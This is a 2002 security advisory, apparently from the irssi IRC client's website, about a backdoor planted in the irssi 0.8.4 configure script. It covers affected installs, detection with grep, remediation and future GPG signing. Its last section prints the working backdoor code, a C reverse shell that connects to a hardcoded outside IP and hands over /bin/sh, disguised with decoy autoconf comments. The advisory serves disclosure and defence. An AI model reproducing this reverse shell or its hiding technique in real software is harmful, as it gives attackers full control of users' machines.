>From http://real.irssi.org/?page=backdoor :

irssi 0.8.4 backdoor

   So, it seems someone has backdoored irssi's configure script about a
   month ago, 2002-04-19 most likely. If you installed irssi after that,
   you might have run a backdoor that gave remote attacker access to your
   computer.

What did the backdoor do? How to get rid of it?

   The backdoored configure script spawns a new shell, connects to some
   server and allows full shell access to it. So, it might have done
   anything.

   At least currently the server where it connects to doesn't do anything
   automatically. I'd guess it just waits there for commands. As for
   fixing it, it really depends on what it did, and we don't know that.
   So possibly it didn't do anything, and you don't need to do anything,
   but possibly it ran a rootkit or whatever and you'll need to reinstall
   your whole system. I'd suggest doing that if you have any doubt.

   In any case, you should make sure the process isn't running anymore by
   killing all your /bin/sh processes, or by rebooting.

   If you can find out if the backdoor did anything, please let me know.

How do I know if I'm affected?

   The backdoor was only in configure, the built binary itself isn't
   backdoored. Here's some ways to figure out if you're affected:
     * If you installed irssi from binary, you're safe.
     * Debian sources aren't backdoored.
     * Nightly source snapshots don't seem to be backdoored..
     * CVS doesn't seem to be backdoored..
     * If you let irssi download the GLib sources from irssi.org, they
       are backdoored
     * If you still have the sources, check with grep SOCK_STREAM
       configure. If it returns any lines, it's backdoored.

Future plans

   From now on, all new releases will be signed with GPG, and checked
   automatically at least daily for any changes. I'll also start
   checksumming and diffing any scripts and other stuff as well for
   changes.

   main.irssi.org is also moved elsewhere for now, CVS is temporarily
   down but everything else should work. Mirrors should catch up
   automatically soon.

What exactly was the backdoor?

   These lines were found from configure script:
        int s;
        struct sockaddr_in sa;
        switch(fork()) { case 0: break; default: exit(0); }
        if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
                exit(1);
        }
  /* HP/UX 9 (%@#!) writes to sscanf strings */
        memset(&sa, 0, sizeof(sa));
        sa.sin_family = AF_INET;
        sa.sin_port = htons(6667);
        sa.sin_addr.s_addr = inet_addr("204.120.36.206");
        if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
                exit(1);
        }
        dup2(s, 0); dup2(s, 1); dup2(s, 2);
/* The GNU C library defines this for functions which it implements
    to always fail with ENOSYS.  Some functions are actually named
    something starting with __ and the normal name is an alias.  */
        { char *args[] = { "/bin/sh", NULL }; execve(args[0], args, NULL); }

   Also the IP just changed yesterday from 209.164.15.215.